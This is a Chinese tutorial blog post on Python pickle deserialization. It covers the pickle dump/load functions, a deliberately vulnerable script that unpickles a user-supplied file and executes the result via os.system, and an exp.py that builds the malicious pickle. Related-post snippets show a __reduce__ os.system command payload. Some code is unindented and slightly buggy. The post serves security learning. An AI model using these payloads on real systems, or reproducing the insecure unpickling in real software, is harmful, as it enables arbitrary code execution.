python pickle反序列化漏洞_【反序列化】Python反序列化之pickle篇

最新推荐文章于 2024-06-24 15:00:36 发布
最新推荐文章于 2024-06-24 15:00:36 发布
阅读量192 收藏
点赞数
文章标签: python pickle反序列化漏洞

0x01 前言

前两天在安全客中看了一篇python对象注入的文章,感觉写的很好,就学习一下,在此记录一下。

0x02 Python之pickle

在研究python反序列化漏洞之前,我们需要了解本次研究的主体:pickle模块

这里主要需要知道4个方法:

dump()

dumps()

load()

loads()

pickle.dump(obj, file, [protocol])

dump()会将对象序列化后写入一个文件中,其中,文件需要有write接口,protocol代表的是协议,当protocol=0的时候表示序列化对象用可表示的ascii码写,当protocol=1的时候代表用二进制表示,那么文件就要用wb模式打开,当protocol=2的时候也是用二进制表示,在python2.3之后的版本可以使用,会更高效一些,默认protocol=0。

pickle.dumps(obj)

与dump()不同的是,dumps()只是将序列化对象当作字符串返回

pickle.load(file)

load()会读入file的内容,并将其反序列化为对象,file的内容要求是序列化的内容。

pickle.loads(pick_data)

loads()会将序列化的字符串反序列化为对象

cPickle与pickle的用法差不多,但是cPickle使用C语言写的,别pickle更高效,现在大部分都会使用cPickle来代替pickle了。

0x03 Python对象注入之pickle

什么是对象注入?回想一下之前讲PHP反序列化漏洞的时候的概念,其实差不多,在pickle中,序列化的过程是没有问题的,但是当反序列化的过程中,如果用户的输入被传入unpickling中时,那么就有可能存在对象注入的风险。

举个例子:

import cPickle as pickle

import os, sys

arg = sys.argv[1]

class Test(object):

def load(self, filenmae=None):

with open(filenmae, 'rb') as pick_file:

self.doWork = pickle.load(pick_file)

self.workDone = self.doWork

def final_workout(self, unpickled_data):

self.filename = "code.py"

self.writeinto = open(self.filename, "w")

self.writeinto.write(unpickled_data)

print "Flag = 1"

self.writeinto.close()

os.system("python2 {}".format(str(self.filename)))

if __name__ == '__main__':

test = Test()

test.load(arg)

unpickled_data = test.workDone

test.final_workout(unpickled_data)

这段代码中,首先他有一个接受用户输入的功能,并且反序列化了用户的输入,并放入一个叫做code.py脚本中执行,那么我们就可以构造特定的字符串来执行我们想要的功能。

0x04 漏洞利用编写

exp.py

import cPickle as pickle

filename = "pickle_data2.txt"

code = "code.txt"

class Test(object):

def load(self, code):

self.code = code

self.readin = open(code, "r")

self.readin_data = self.readin.read()

self.done = pickle.dumps(self.readin_data)

def write_into(self, filename, pickle_data):

self.writeinto =open(filename, "w")

self.writeinto.write(pickle_data)

print "Writing pickle data into the file..."

self.writeinto.close()

def read_into(self, filenmae):

self.filename = filename

self.readinto = open(filename, "r")

self.ret_data = self.readinto.read()

print "\n\n"

print "Pickle data: \n\n"

print self.readin_data

if __name__ == '__main__':

test = Test()

test.load(code)

pickle_data = test.done

test.write_into(filename, pickle_data)

test.read_into(filename)

weixin_39626211
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Python Pickle反序列化漏洞
Lemon's blog
11-15 4595
前言: 刷题的时候做了一道[CISCN2019]ikun的题目,提示考察的知识点是Python Pickle,之前接触的都是有关PHP反序列化,这次就来好好学习一下Python Pickle反序列化漏洞。 基础知识 0x00:Pickle库及函数 picklepython语言的一个标准模块,实现了基本的数据序列化和反序列化pickle模块是以二进制的形式序列化后保存到文件中(保存文件的后缀为.pkl),不能直接打开进行预览。 函数 说明 dumps 对象反序列化为bytes对象
Python3.5 Json与pickle实现数据序列化与反序列化操作示例
09-19
Python3.5中的数据序列化和反序列化是将数据对象转化为可持久化的格式,以便存储或传输。这里主要讨论两种常见的序列化库:Json和pickle。 1. Json: Json (JavaScript Object Notation) 是一种轻量级的数据交换...
python pickle反序列化漏洞_Python反序列化漏洞
weixin_39745013的博客
12-08 250
1、什么是序列化和php的序列化一样,是把string,字典,数组,类这些数据当作字节储存2、picklepickle.dumps()和pickle.loads() 分别是序列化和反序列化pickle.dump()和pickle.load是对文件的写入import picklex= 'cccccc'y = [1,2,3,4]z = {'name':'hzx','pass':'zzz'}print(...
详解python pickle中的反序列化漏洞
最新发布
公众号:该用户快成仙了
06-24 916
反序列化过程有漏洞:如果我们反序列化了一个不可信的数据源,那就可能引发反序列化攻击。攻击者可以在序列化的数据里嵌入恶意代码,当你反序列化这个数据时,这些恶意代码就会被执行,可能会导致数据泄露、系统崩溃,甚至让攻击者远程控制你的系统。Pickle模块是Python自带的,它主要用来序列化和反序列化Python对象。你可以用Pickle把任何Python对象(包括复杂的数据结构)保存成字节流,然后在需要的时候再加载回来。Pickle的工作原理Pickle的工作原理其实很简单。
PythonPickle/PyTorch反序列化漏洞
兴趣使然的创作者
02-28 1284
一个漏洞
pickle反序列化漏洞基础知识与绕过简析
yj520400的博客
03-25 991
的结合,先获取一个全局函数,然后寻找栈中的上一个MARK,并组合之间的数据为元组,以该元组为参数执行全局函数(或实例化一个对象).其中两个dump函数是把python对象转换为二进制对象的,两个load函数是把二进制对象转换为python对象的.在Python中,面向对象的思想和php是一致的,只是定义类的代码,调用类函数和类属性的方式和php不同.方法且该方法返回一个迭代器对象,那么这个对象就被认为是可迭代的。语言.也就是说在Python中几乎一切皆为对象.这也为我们的绕过提供的不小的便利.
Python Pickle 反序列化漏洞
qq_46001025的博客
10-05 246
需要注意的一点:注意:对于我们自己定义的class,如果直接以 data=‘aaa’ 的方式赋初值,则这个date不会被打包,解决方案是写一个__init__()方法。python反序列化漏洞的产生和php的魔术方法有异曲同工之处,在Python2中的 __reduce__() 方法,会在每次的反序列化开始或结束时调用。字节码,如果python有写入的权限,那么会生成一个 .pyc 的字节码文件,若没有那就再内存中生成字节码,程序结束后丢弃。(以下称为机器吧)维护了两个东西:栈区和存储区。
python反序列化漏洞 任意代码执行
01-20
博客我将介绍 python反序列化漏洞 任意代码执行 那么怎么反序列化中运行任意代码呢? 首先要说说__reduce__这个魔术方法, 这个方法用来表明类的对象应当如何序列化, 当其返回tuple类型时就可以实现任意代码...
Python使用pickle进行序列化和反序列化的示例代码
12-16
Pythonpickle模块是一个强大的工具,用于对象的序列化和反序列化。序列化是将对象转换为可存储或传输的数据格式的过程,而反序列化则是将这种格式恢复为原始对象的过程。在Python中,pickle模块提供了这个功能,...
Python Pickle 实现在同一个文件中序列化多个对象
09-18
Python编程语言中,Pickle模块是一个强大的工具,它允许我们序列化和反序列化Python对象结构。也就是说,它能够将复杂的数据结构或对象状态保存到磁盘文件中,并且之后可以从文件中恢复这些状态。在本文章中,...
Python pickle模块实现对象序列化
09-18
Python中的pickle模块是一个用于序列化和反序列化Python对象结构的标准工具。它能够把Python对象转换成一种字节流,这种字节流可以存储在文件中,或者传输到网络,最终再恢复成原来的对象,支持的数据结构包括字典、...
Pythonpickle反序列化漏洞
Elite的博客
09-17 807
picklePython 的序列化模块,用于将 Python 对象转换为字节流,以便于存储或传输。反序列化是将字节流还原为对象的过程。然而,pickle 反序列化操作的不安全性在于,它可以执行在字节流中包含的任意代码,而不加以验证和限制。
python pickle反序列化漏洞
weixin_43610673的博客
05-20 3032
前置知识 什么是pickle picklePython专用的一个进行序列化和反序列化的工具包,pickle能表示Python几乎所有的类型(包括自定义类型),由一系列opcode组成,模拟了类似堆栈的内存。 与PHP序列化或者JSON,这些以键值对形式存储序列化对象数据的不同,pickle 序列化(Python独有)是将一个 Python 对象及其所拥有的层次结构变成可以持久化储存的二进制数据,无法像JSON 一样直观阅读。在Python中,采用术语 封存 (pickling)和 解封 (unpickli
python pickle反序列化漏洞_Python Pickle反序列化漏洞
weixin_39890289的博客
12-08 174
命令执行#模仿Epicccal师傅的例子import pickleimport osclass Test2(object):def __reduce__(self):#被调用函数的参数cmd = "/usr/bin/id"return (os.system,(cmd,))if __name__ == "__main__":test = Test2()#执行序列化操作result1 = pickle...
python pickle反序列化漏洞_(Python)cPickle反序列化漏洞
weixin_39851048的博客
12-08 238
基本概念Python中有个库可以实现序列化和反序列化操作,名为pickle或cPickle,作用和PHP的serialize与unserialize一样,两者只是实现的语言不同,一个是纯Python实现、另一个是C实现,函数调用基本相同,但cPickle库的性能更好,因此这里选用cPickle库作为示例。cPickle可以对任意一种类型的Python对象进行序列化操作。下面是主要的四个函数:cPi...
[python]pickle反序列化漏洞(未完结)
山可行,海可平
03-29 5437
基础知识 实现:pickle或cpickle,二者仅实现语言不同(前纯python,后C),而cPickle性能更好 pickle库 标注库,实现了数据序列化和反序列化 pickle模块是以二进制的形式序列化后保存到文件(后缀:.pkl),不能直接打开 序列化后字符串的表意、序列化的规则->PVM(python序列化和反序列化过程最根本的) PVM 解释字节码的解释引擎 执行流程 PVM将源码编译成字节码 python将编译好的字节码转发到PVM(python虚拟机),PVM循环迭代执行字节码指令
pickle 反序列化漏洞浅析
Derait的博客
08-07 1052
pickle 反序列化漏洞浅析 Pickle库及函数 picklepython语言的一个标准模块,实现了基本的数据序列化和反序列化pickle模块是以二进制的形式序列化后保存到文件中(保存文件的后缀为.pkl),不能直接打开进行预览。 函数 说明 dumps 对象反序列化为bytes对象 dump 对象反序列化到文件对象,存入文件 loads 从bytes对象反序列化 load 对象反序列化,从文件中读取数据 先通过几个例子来看下这几个函数的作用: dump/load
python安全之Pickle反序列化漏洞学习。
Mrs_H的博客
10-28 2007
前言 写这文章的起因是两次遇到python pickle的题目都只做到了命令执行的程度,但都没有反弹shell。看别人的wp都是通过curl将flag拉到vps上的,怎么说呢,死于没有公网IP。虽然之前在做题的时候,照着网上的exp可以把自己的payload改个七七八八,但是说实话我距离真正意义上的“手撸”opcode还是有着一段距离。这文章主要还是通过我所遇到的pickle反序列化题目出发进行编写,当然也少不了pickle的原理部分。 正文 在正式开始这文章之前,我想先贴出一位大佬的文章Pion1e
BUUCTF pickle反序列化漏洞
09-07
BUUCTF中的Pickle反序列化漏洞是指在该比赛的题目中存在通过反序列化攻击来执行任意代码的漏洞。具体来说,这个漏洞利用了Python中的pickle模块,pickle模块可以将对象序列化为字符串并保存到文件或通过网络传输。然后可以将这个字符串反序列化为原来的对象。这个过程中,如果不对反序列化的输入进行充分验证和过滤,攻击者可以构造恶意的pickle字符串,从而在反序列化的过程中执行任意代码。 在BUUCTF中,有一个题目叫做"Pickle Store",该题目利用了pickle模块的反序列化功能,并在反序列化的过程中执行了恶意代码。具体的攻击方法是,通过抓包获取到一个包含pickle字符串的session值,然后对这个字符串进行base64解码,并使用pickle模块的loads函数进行反序列化操作。这样就可以触发恶意代码的执行。 为了说明这个例子,作者提供了一个脚本来解析这个pickle字符串,首先使用base64解码得到原始字符串,然后使用pickle模块的loads函数进行反序列化操作,并最终执行恶意代码。这个例子展示了如何利用pickle模块的反序列化功能来执行任意代码。 在pickle模块中,还有一些其他的相关函数和方法可以帮助我们理解和分析pickle字符串的结构和内容。例如,pickletools模块提供了dis函数来反汇编pickle字符串,以及optimize函数来优化和简化pickle字符串的内容。 总结来说,BUUCTF中的Pickle反序列化漏洞是利用了pickle模块的反序列化功能来执行任意代码的漏洞。攻击者通过构造恶意的pickle字符串,可以在反序列化的过程中执行任意代码。为了解析和分析pickle字符串,可以使用pickle模块提供的函数和方法,如loads、pickletools.dis和pickletools.optimize。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值